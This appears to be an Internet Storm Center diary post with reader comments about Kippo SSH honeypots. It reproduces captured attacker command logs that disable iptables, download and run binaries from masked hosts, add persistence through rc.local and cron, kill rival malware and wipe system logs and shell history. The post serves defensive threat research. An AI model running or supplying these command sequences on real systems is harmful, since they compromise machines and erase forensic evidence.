A number of my fellow Handlers have discussed Kippo [1], a SSH honeypot that can record adversarial behaviour, be it human or machine. Normal behaviour against my set of Kippo honeypots is randomly predictable; a mixture of known bad IP ranges, researchers or from behind TOR scanning and probing, would be attackers manually entering information from their jump boxes or home machines.
I’d normally offer up any captured binaries for further analysis, if the teams had the capacity to do this or dump them through an automated sandbox like Cuckoo [5] to pick out the more obvious indicators of compromise or further pieces of information to research (especially hard coded commands, IP addresses, domain names etc)
Chris Mohan --- Internet Storm Center Handler on Duty Recorded commands by Kippo
service iptables stop wget hxxp://x.x.x.x:8889/badfile1 chmod u+x badfile1 ./ badfile1 & cd /tmp tmp# wget hxxp://x.x.x.x:8889/badfile2 chmod u+x badfile2 ./ badfile2 & bash: ./ badfile2: command not found /tmp# cd /tmp /tmp# echo "cd /root/">>/etc/rc.local cd /root/>>/etc/rc.local /tmp# echo "./ badfile1&">>/etc/rc.local ./ badfile1&>>/etc/rc.local /tmp# echo "./ badfile2&">>/etc/rc.local ./ux badfile2&>>/etc/rc.local /tmp# echo "/etc/init.d/iptables stop">>/etc/rc.local /etc/init.d/iptables stop>>/etc/rc.local
[2] File hash 1 0601aa569d59175733db947f17919bb7 https://www.virustotal.com/en/file/22ec5b35a3b99b6d1562becb18505d7820cbcfeeb1a9882fb7fc4629f74fbd14/analysis/ [4] http://sourceforge.net/projects/hfs/ |
Chris 105 Posts ISC Handler Nov 10th 2014 |
Thread locked Subscribe |
Nov 10th 2014 7 years ago |
I tested it on my machines. I don't have iptales service (I still have a firewall).
I have rigorous rules for firewall (but unfortunately outcoming traffic on 80/443 is allowed to all). Password authentication is turned off (and sometimes is on only for nontrivial usernames). I think that some simple rules can cut off ~97% of threats. |
Anonymous |
Quote |
Nov 11th 2014 7 years ago |
Hi Chris,
I have been seeing similar actions on my own Kippo honeypot (an example of the log below). From the little amount of analysis that i have performed on the files that the scripted attack attempted to pull to my kippo machine, it looks like it attempts to download and execute a malicious file exploiting a linux vulnerability. Not sure which one as i said havnt really looked into it enough. md5sum of the files are below. If you want more let me know and i can provide you with the logs that i have been collecting since early October. Ive also taken out the domain for privacy reasons but can provide it if you wish. Kind Regards, Daniel Parker 2014-11-11 05:18:01+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,5792,122.225.97.69] executing command "/etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc;rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT killall -9 82BOT killall -9 dos64 killall -9 dos32 killall -9 new6 killall -9 new4 killall -9 node24 killall -9 mimi killall -9 nodeJR-1 killall -9 freeBSD killall -9 ksapdd killall -9 106 killall -9 09 killall -9 xsw killall -9 syslogd killall -9 skysapdd killall -9 cupsddd killall -9 ksapd killall -9 atddd killall -9 xfsdxd killall -9 sfewfesfs killall -9 gfhjrtfyhuf killall -9 rewgtf3er4t killall -9 fdsfsfvff killall -9 smarvtd killall -9 whitptabil killall -9 gdmorpen cd /etc;chattr -i 66 cd /root; chmod 7777 / etc killall -9 minerd killall -9 syn killall -9 joudckfr killall -9 www killall -9 log killall -9 .IptabLes killall -9 .IptabLex killall -9 .Mm2 killall -9 acpid killall -9 m64 killall -9 ./QQ killall -9 aabb killall -9 g3 killall -9 S99local killall -9 3 killall -9 pm killall -9 qweasd killall -9 tangtang killall -9 imap-login killall -9 xudp killall -9 sshpa killall -9 008 killall -9 txma killall -9 mrdos64.b00 killall -9 mrdos32.b00 killall -9 kkpklp killall -9 kiilp killall -9 xin1 killall -9 jibateng killall -9 syscore.sh killall -9 syscore.sh killall -9 syscore.sh killall -9 .mimeo killall -9 .mimeo killall -9 .mimeo killall -9 .mimeop killall -9 .task1 killall -9 .mimeop killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex cd /root;rm -rf dir nohup.out cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsddd.* cd /etc;rm -rf dir atddd.* cd /etc;rm -rf dir ksapdd.* cd /etc;rm -rf dir kysapdd.* cd /etc;rm -rf dir sksapdd.* cd /etc;rm -rf dir skysapdd.* cd /etc;rm -rf dir xfsdxd.* cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsdd.* cd /etc;rm -rf dir atdd.* cd /etc;rm -rf dir ksapd.* cd /etc;rm -rf dir kysapd.* cd /etc;rm -rf dir sksapd.* cd /etc;rm -rf dir skysapd.* cd /etc;rm -rf dir xfsdx.* cd /etc;rm -rf dir sfewfesfs cd /etc;rm -rf dir gfhjrtfyhuf cd /etc;rm -rf dir rewgtf3er4t cd /etc;rm -rf dir fdsfsfvff cd /etc;rm -rf dir smarvtd cd /etc;rm -rf dir whitptabil cd /etc;rm -rf dir gdmorpen cd /etc;rm -rf dir sfewfesfs.* cd /etc;rm -rf dir gfhjrtfyhuf.* cd /etc;rm -rf dir rewgtf3er4t.* cd /etc;rm -rf dir fdsfsfvff.* cd /etc;rm -rf dir smarvtd.* cd /etc;rm -rf dir whitptabil.* cd /etc;rm -rf dir gdmorpen.* cd /etc;rm -rf dir nhgbhhj.* cd /tmp;rm -rf dir 1.* cd /tmp;rm -rf dir 2.* cd /tmp;rm -rf dir 3.* cd /tmp;rm -rf dir 4.* cd /tmp;rm -rf dir 5.* cd /tmp;rm -rf dir jdhe cd /tmp;rm -rf dir jdhe.* cd /var/spool/cron; rm -rf dir root.* cd /var/spool/cron; rm -rf dir root cd /var/spool/cron/crontabs; rm -rf dir root.* cd /var/spool/cron/crontabs; rm -rf dir root cd /var/spool/cron ;wget -c http://www.xxxxxxx.com:9162/root cd /var/spool/cron/crontabs ;wget -c http://www.xxxxxxx.com:9162/root yes|mv /tmp/root /var/spool/cron yes|mv /tmp/root /var/spool/cron/crontabs cd /tmp;wget -c http://www.xxxxxxx.com:9162/jdhe cd /etc;wget -c http://www.xxxxxxx.com:9162/sfewfesfs cd /etc;wget -c http://www.xxxxxxx.com:9162/gfhjrtfyhuf cd /etc;wget -c http://www.xxxxxxx.com:9162/rewgtf3er4t cd /etc;wget -c http://www.xxxxxxx.com:9162/fdsfsfvff cd /etc;wget -c http://www.xxxxxxx.com:9162/smarvtd cd /etc;wget -c http://www.xxxxxxx.com:9162/whitptabil cd /etc;wget -c http://www.xxxxxxx.com:9162/gdmorpen cd /etc;wget -c http://www.xxxxxxx.com:9162/nhgbhhj cd /etc;wget -c http://www.xxxxxxx.com:9162/byv832 cd /tmp;chmod 7777 jdhe cd /etc;chmod 7777 nhgbhhj cd /etc;chmod 7777 byv832 cd /etc;chmod 7777 sfewfesfs cd /etc;chmod 7777 gfhjrtfyhuf cd /etc;chmod 7777 rewgtf3er4t cd /etc;chmod 7777 fdsfsfvff cd /etc;chmod 7777 smarvtd cd /etc;chmod 7777 whitptabil cd /etc;chmod 7777 gdmorpen cd /tmp;chmod 7777 nhgbhhj cd /tmp;chmod 7777 byv832 cd /tmp;chmod 7777 sfewfesfs cd /tmp;chmod 7777 gfhjrtfyhuf cd /tmp;chmod 7777 rewgtf3er4t cd /tmp;chmod 7777 fdsfsfvff cd /tmp;chmod 7777 smarvtd cd /tmp;chmod 7777 whitptabil cd /tmp;chmod 7777 gdmorpen cd /tmp;./jdhe nohup /etc/sfewfesfs > /dev/null 2>&1& nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& nohup /etc/rewgtf3er4t > /dev/null 2>&1& nohup /etc/fdsfsfvff > /dev/null 2>&1& nohup /etc/smarvtd > /dev/null 2>&1& nohup /etc/whitptabil > /dev/null 2>&1& nohup /etc/gdmorpen > /dev/null 2>&1& nohup /etc/nhgbhhj > /dev/null 2>&1& nohup /etc/byv832 > /dev/null 2>&1& nohup /tmp/sfewfesfs > /dev/null 2>&1& nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& nohup /tmp/rewgtf3er4t > /dev/null 2>&1& nohup /tmp/fdsfsfvff > /dev/null 2>&1& nohup /tmp/smarvtd > /dev/null 2>&1& nohup /tmp/whitptabil > /dev/null 2>&1& nohup /tmp/gdmorpen > /dev/null 2>&1& nohup /tmp/nhgbhhj > /dev/null 2>&1& nohup /tmp/byv832 > /dev/null 2>&1& echo "cd /tmp;./sfewfesfs" >> /etc/rc.local echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local echo "cd /tmp;./smarvtd" >> /etc/rc.local echo "cd /tmp;./whitptabil" >> /etc/rc.local echo "cd /tmp;./gdmorpen" >> /etc/rc.local echo "cd /etc;./sfewfesfs" >> /etc/rc.local echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local echo "cd /etc;./fdsfsfvff" >> /etc/rc.local echo "cd /etc;./smarvtd" >> /etc/rc.local echo "cd /etc;./whitptabil" >> /etc/rc.local echo "cd /etc;./gdmorpen" >> /etc/rc.local echo "unset MAILCHECK" >> /etc/profile cd /etc;chattr +i sfewfesfs rm -rf /root/.bash_history touch /root/.bash_history history -r cd /var/log > dmesg cd /var/log > auth.log cd /var/log > alternatives.log cd /var/log > boot.log cd /var/log > btmp cd /var/log > cron cd /var/log > cups cd /var/log > daemon.log cd /var/log > dpkg.log cd /var/log > faillog cd /var/log > kern.log cd /var/log > lastlog cd /var/log > maillog cd /var/log > user.log cd /var/log > Xorg.x.log cd /var/log > anaconda.log cd /var/log > yum.log cd /var/log > secure cd /var/log > wtmp cd /var/log > utmp cd /var/log > messages cd /var/log > spooler cd /var/log > sudolog cd /var/log > aculog cd /var/log > access-log cd /root > .bash_history history -c" md5sum a3e718751e600c4e8503ac6836b84aba kippo/dl/20141111002520__tmp_1 e62089b51f3b485b891359accdb11bdc kippo/dl/20141111002520__tmp_2 585be83c1ee0ad009379369717ba988c kippo/dl/20141111002522__tmp_3 9a501b92f3cf548ba13478f1b5855c68 kippo/dl/20141111002523__tmp_4 ff1e9d1fc459dd83333fd94dbe36229a kippo/dl/20141111002523__tmp_5 f7556d9ede5d988400b1edbb1a172634 kippo/dl/20141111002524__tmp_byv832 048016c6e6848f92a29296b72df4d2d8 kippo/dl/20141111002536__tmp_fdsfsfvff 9941a4dc930868a5739a8004de53a686 kippo/dl/20141111002548__tmp_gfhjrtfyhuf 18bcb1c192df95a4216946f0294135bf kippo/dl/20141111002558__tmp_rewgtf3er4t 090dae205e10bc21dad0a13cba11446d kippo/dl/20141111002614__tmp_root 8285f35183f0341b8dfe425b7348411d kippo/dl/20141111002618__tmp_sfewfesfs 9941a4dc930868a5739a8004de53a686 kippo/dl/20141111002643__tmp_smarvtd |
dparker 1 Posts |
Quote |
Nov 11th 2014 7 years ago |
This group is desciped quite heavily by MalwareMustDie (http://blog.malwaremustdie.org/)
A |
A 3 Posts |
Quote |
Nov 11th 2014 7 years ago |
Sign Up for Free or Log In to start participating in the conversation!